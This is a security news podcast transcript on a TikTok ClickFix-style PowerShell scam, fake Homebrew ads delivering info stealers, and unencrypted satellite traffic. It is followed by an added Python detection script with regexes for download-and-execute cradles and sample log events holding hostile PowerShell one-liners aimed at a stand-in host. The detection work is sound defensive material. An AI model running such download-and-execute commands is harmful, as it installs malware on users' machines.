Hello and welcome to the Monday, October 20th 2025 edition of the SANS Internet Storm Center's Stormcast. My name is Johannes Ullrich, recording today from Jacksonville, Florida. And this episode is brought to you by the SANS.edu graduate certificate program in cybersecurity engineering.

TikTok apparently has learned from ClickFix. Xavier came across a TikTok video that advertised ways to get Photoshop for free. But of course, instead of getting free versions of expensive software, you're actually stuck with malware. The technique used here is very similar to what's commonly used as ClickFix, where you're being prompted with a captcha and then you have to essentially copy-paste PowerShell code into your PowerShell window on your Windows machine. Well, here, the difference is only that it's done via TikTok. So the TikTok video basically tells you how to copy, or how to type, the PowerShell script into your PowerShell window, which of course you're first being instructed to start as an administrator. And then while the malicious code is executed, in this code additional malware is being downloaded that will then essentially download info stealers or whatever the attacker would like to load on your system. Good news is that VirusTotal promises a good recognition rate for at least this particular version of this scam. But there are literally hundreds out there that do similar things that, again, now promise free software, but then trick you into actually executing this PowerShell code. And it's not always that obvious really what you're executing here, because they're kind of doing the Windows equivalent of just downloading some code and then piping it to a shell. So it's not that you're actually typing the code here into your PowerShell window; you're really just using PowerShell to download a file from a website and then executing it, which is a little bit more stealthy. And maybe people think, even if they understand kind of what that PowerShell does, hey, you know, I'm just downloading some free software or some patch for the software to make it free. And that's maybe why this particular trick is still successful.

And then, talking about victims being tricked into executing malicious code, well, we do have another case where actually Google ads are being used to advertise tools that are particularly popular with developers, and they're somewhat focusing on macOS, like Homebrew. Homebrew is this package manager that allows you to install a lot of open source packages on macOS. I use it; it's very popular, particularly with developers, for installing additional tools, little command line utilities and such, Git extensions and things like that. So definitely one of the target groups here are developers, and yes, they're then ending up again with info stealers. And that's what hunt.io here discovered as part of their blog post.

Researchers at the University of California at San Diego, as well as the University of Maryland, have demonstrated that it's relatively easy to not only eavesdrop on signals being sent to and from satellites, but also that much of that traffic is unencrypted. The information sort of was presented at a recent conference and the paper has now been made public. You may have seen some news reports about it about a week ago, but now we have the actual paper available, and also no more paywall for the actual information in the paper. The lesson here really is something that's not really that new: as soon as the network traffic leaves the network jack on your system, it does enter hostile territory. So you better make sure that you properly authenticate, that you are properly encrypting your traffic, and that you make sure that the traffic is not being altered in transit. And while your two main mechanisms for doing this are, of course, TLS, that's usually the simplest way and the most common way how it is done, or one of the many VPN options that you have available, there are some cases where you don't really have a choice. And the one example here that they point out is good old phone calls, which are often also not encrypted. But basically, the satellite traffic itself does not offer any encryption. So you rely on whatever traffic is being sent to be already encrypted before it's being passed to the satellite network. Of course, this also depends on the particular technology being used by the satellite. This here is sort of a more traditional telecommunication satellite, which really is just a relay of traffic. It doesn't really sort of alter the traffic, like encryption or anything like that. That's not really the point of a satellite like this. More modern satellites like Starlink and similar constellations, they are actually encrypting traffic, of course in part also to protect the network against rogue access and making sure everybody has a proper account that accesses the network.

Well, that's it for today. Remember, on Saturday, I'll be speaking at B-Sides Augusta. So hope to see some listeners there in person. Otherwise, thanks for liking and subscribing to this podcast, and talk to you again tomorrow. Bye.
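As an added example (not from the episode or the ISC), a small Python triage script for the "use PowerShell to download a file and execute it" pattern the TikTok ClickFix variant relies on, run over constructed PowerShell script block log events (Event ID 4104, which assumes script block logging is enabled on the endpoint). The regexes and sample events are illustrative assumptions, not a complete signature set.

```python
import re

# Illustrative detection rules for PowerShell "download cradle" script blocks
# (assumption: these regexes are a starting point, not an authoritative ruleset).
DOWNLOAD_RE = re.compile(
    r"(Invoke-WebRequest|\biwr\b|\bcurl\b|\bwget\b|DownloadString|DownloadFile|"
    r"Net\.WebClient|Invoke-RestMethod|\birm\b|Start-BitsTransfer)", re.I)
EXECUTE_RE = re.compile(r"(Invoke-Expression|\biex\b|\bsaps\b|Start-Process|&\s*\(|\.Invoke\()", re.I)
ENCODED_RE = re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{40,}", re.I)
BYPASS_RE = re.compile(r"-e(xecutionpolicy|p)\s+bypass|-w(indowstyle)?\s+hidden|-nop\b", re.I)
RAW_IP_URL_RE = re.compile(r"https?://\d{1,3}(\.\d{1,3}){3}")


def score_script_block(text):
    """Return (score, reasons) for one ScriptBlockText value; score 0 means nothing suspicious."""
    reasons = []
    if DOWNLOAD_RE.search(text) and EXECUTE_RE.search(text):
        reasons.append("download-and-execute cradle")   # fetch + run in one block
    if ENCODED_RE.search(text):
        reasons.append("encoded command")               # base64 payload hides the script
    if BYPASS_RE.search(text):
        reasons.append("policy bypass / hidden window")
    if RAW_IP_URL_RE.search(text):
        reasons.append("raw IP URL")
    return len(reasons), reasons


def scan_events(events):
    """Return [(RecordId, score, reasons)] for 4104 events that trip at least one rule."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 4104:      # only script block logging events carry the script text
            continue
        score, reasons = score_script_block(ev.get("ScriptBlockText", ""))
        if score:
            hits.append((ev["RecordId"], score, reasons))
    return hits


# Constructed sample events (not from the episode), shaped like 4104 script block log records.
SAMPLE_EVENTS = [
    {"RecordId": 1, "EventID": 4104, "ScriptBlockText": "Get-ChildItem C:\\Users | Select-Object Name"},
    {"RecordId": 2, "EventID": 4104, "ScriptBlockText": "iex (iwr 'http://example.invalid/activate.ps1' -UseBasicParsing).Content"},
    {"RecordId": 3, "EventID": 4104, "ScriptBlockText": "powershell -w hidden -nop -ep Bypass -e QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVphYmNkZWZnaGlqa2xtbm9w"},
    {"RecordId": 4, "EventID": 4103, "ScriptBlockText": "iex (iwr http://example.invalid/x)"},
]

if __name__ == "__main__":
    for record_id, score, reasons in scan_events(SAMPLE_EVENTS):
        print(f"record {record_id}: score {score}: {', '.join(reasons)}")
```

A production version would also correlate the 4104 event with the parent process (a browser or explorer.exe spawning an elevated PowerShell is the tell for the "run as administrator" step described above).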